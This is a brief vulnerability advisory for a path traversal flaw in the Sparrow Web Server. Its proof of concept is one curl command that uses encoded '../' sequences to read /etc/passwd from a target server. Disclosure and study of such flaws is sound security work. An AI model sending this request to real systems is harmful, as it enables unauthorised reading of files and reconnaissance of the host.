Sparrow Web Server suffers from a directory traversal vulnerability.
bca941889016395fc4ea26b1d05b3ad0300e1155974bdfb8ba314432a81335ea
# Title: Sparrow Web Server - Path Traversal
# Author: Nassim Asrir
# Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Researcher At: Henceforth
# CVE: N/A
# Vendor #:
https://github.com/codercheng/sparrow
# Download #:
https://github.com/codercheng/sparrow
# Vulnerability Type#:
Path Traversal
# Exploit type #
Local - Remote
# POC #:
To exploit this vulnerability use Curl libray:
$ curl http://server-ip/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd